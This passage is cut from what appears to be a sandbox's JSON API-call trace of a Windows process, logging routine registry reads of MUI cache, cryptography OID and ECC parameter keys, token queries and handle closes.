                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1637
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1638
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1639
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1640
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000550"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1641
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1642
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
              }
            ],
            "repeated": 0,
            "id": 1643
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              }
            ],
            "repeated": 0,
            "id": 1644
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1645
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bbf2b2",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              }
            ],
            "repeated": 0,
            "id": 1646
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              }
            ],
            "repeated": 0,
            "id": 1647
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "5"
              },
              {
                "name": "Name",
                "value": "1.3.6.1.4.1.311.92.1.1!7"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7"
              }
            ],
            "repeated": 0,
            "id": 1648
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000540"
              },
              {
                "name": "SubKey",
                "value": "1.3.6.1.4.1.311.92.1.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7"
              }
            ],
            "repeated": 0,
            "id": 1649
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000544"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "1"
              },
              {
                "name": "MaxValueNameLength",
                "value": "4"
              },
              {
                "name": "MaxValueLength",
                "value": "88"
              }
            ],
            "repeated": 0,
            "id": 1650
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1651
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf1d0",
            "parentcaller": "0x7ffee0bb34e9",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7"
              }
            ],
            "repeated": 0,
            "id": 1652
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1653
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1654
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1655
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1656
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1657
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1658
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1659
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1660
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\NgcRecovery.dll"
              }
            ],
            "repeated": 0,
            "id": 1661
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              }
            ],
            "repeated": 0,
            "id": 1662
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1663
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1664
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1665
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1666
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1667
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1668
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1669
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000550"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1670
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1671
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\NgcRecovery.dll"
              }
            ],
            "repeated": 0,
            "id": 1672
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
              }
            ],
            "repeated": 0,
            "id": 1673
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1674
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bbf2b2",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              }
            ],
            "repeated": 0,
            "id": 1675
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              }
            ],
            "repeated": 0,
            "id": 1676
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "6"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\"
              }
            ],
            "repeated": 0,
            "id": 1677
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe8a4",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              }
            ],
            "repeated": 0,
            "id": 1678
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6c9",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000053c"
              }
            ],
            "repeated": 0,
            "id": 1679
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6e2",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000538"
              }
            ],
            "repeated": 0,
            "id": 1680
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bb2b05",
            "parentcaller": "0x7ffee0bb2644",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Control\\Cryptography\\ECCParameters"
              },
              {
                "name": "Handle",
                "value": "0x00000538"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Cryptography\\ECCParameters"
              }
            ],
            "repeated": 0,
            "id": 1681
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bb2b3c",
            "parentcaller": "0x7ffee0bb2644",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000538"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Cryptography\\ECCParameters\\"
              }
            ],
            "repeated": 0,
            "id": 1682
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bb2b53",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000538"
              }
            ],
            "repeated": 0,
